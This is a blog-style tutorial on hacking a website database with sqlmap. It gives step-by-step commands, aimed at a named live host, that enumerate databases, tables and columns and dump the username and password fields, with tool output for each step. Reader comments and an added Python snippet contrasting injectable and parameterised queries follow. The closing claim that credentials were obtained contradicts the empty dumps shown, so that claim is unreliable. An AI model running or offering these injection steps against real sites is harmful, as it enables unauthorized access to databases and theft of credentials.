Hacking Website Database with SQLmap in Backtrack 5 or Linux OS

All we need is a vulnerable web page. Let's say you have a URL like this:

http://www.site.com/section.php?id=51

and that it is prone to SQL injection because the developer of that site did not properly escape the parameter id.

This can be tested simply by trying to open the URL

http://www.site.com/section.php?id=51'

We just added a single quote to the parameter. If this URL throws an error, then it is clear that the database reacted with an error because it got an unexpected single quote.
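The flaw described above, as an added example that is not part of the original post: the same id lookup written once with string concatenation and once with input validation plus a bound parameter. Python's sqlite3 stands in for the site's PHP/MySQL stack, and the `section` table, its data and the function names are assumptions made for illustration.

```python
import sqlite3


def make_db():
    # Constructed sample data standing in for the site's database.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE section (id INTEGER PRIMARY KEY, title TEXT)")
    db.execute("INSERT INTO section VALUES (51, 'News')")
    return db


def lookup_vulnerable(db, raw_id):
    # The flaw: the id parameter is pasted into the SQL text, so a stray
    # quote changes the statement the database has to parse.
    query = "SELECT title FROM section WHERE id = " + raw_id
    return db.execute(query).fetchone()


def lookup_hardened(db, raw_id):
    # 1) Validate: id must be a plain ASCII decimal integer.
    if not (raw_id.isascii() and raw_id.isdigit()):
        return None
    # 2) Bind: the value travels separately from the SQL text, so it can
    #    never be parsed as part of the statement.
    query = "SELECT title FROM section WHERE id = ?"
    return db.execute(query, (int(raw_id),)).fetchone()


def probe(lookup, raw_id):
    """Classify one request as 'row', 'no row' or 'sql error'."""
    db = make_db()
    try:
        return "row" if lookup(db, raw_id) else "no row"
    except sqlite3.Error:
        # A database error reaching the page is the signal the quote test relies on.
        return "sql error"
    finally:
        db.close()


if __name__ == "__main__":
    for name, fn in (("vulnerable", lookup_vulnerable), ("hardened", lookup_hardened)):
        for value in ("51", "51'"):
            print(f"{name:10} id={value!r:6} -> {probe(fn, value)}")
```

With the hardened lookup the quoted value is rejected as an ordinary "not found" request, so the page never shows a database error.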

 
Step 1 – Finding Databases
 
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 --dbs

Output
----------
 
web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:00:51] [INFO] fetching database names
available databases [2]:
[*] 554777
[*] information_schema

 


 
Step 2 – Finding the table names
 
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 --tables

Output
----------

web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:01:25] [INFO] fetching tables for database: '554777'
Database: 554777
[6 tables]
+---------------+
| abstract      |
| answer        |
| author        |
| news_details  |
| reporter_list |
| user          |
+---------------+

 


 
Step 3 – Finding the columns
 
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user --columns

Output
----------

web application technology: Apache, PHP 5.4.9
back-end DBMS: MySQL 5.0.11
[13:01:48] [INFO] fetching columns for table 'user' in database '554777'
Database: 554777
Table: user
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| password | varchar(50) |
| role     | varchar(50) |
| username | varchar(50) |
+----------+-------------+

 


 
Step 4 – Finding column values
 
python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C username --dump

Output
----------

Database: 554777
Table: user
[0 entries]
+----------+
| username |
+----------+
+----------+

python sqlmap.py -u http://abstract.freevar.com/abstract.php?batch=2010 -D 554777 -T user -C password --dump

Output
----------

Database: 554777
Table: user
[0 entries]
+----------+
| password |
+----------+
+----------+
 
 
So we get both username and password.


 

2 Responses to “Hacking Website Database with SQLmap in Backtrack 5 or Linux OS”

  1. Human says:

    If the name is username and password is password, why can't I log in to http://abstract.freevar.com/phpmyadmin?

    • Jijo K Jose says:

      Username and password are database user field values. They are not the original phpMyAdmin username and password.

      Using the username and password, you can only log in to the corresponding website.

      In http://abstract.freevar.com I have not included any login page, so you can't log in to that website.
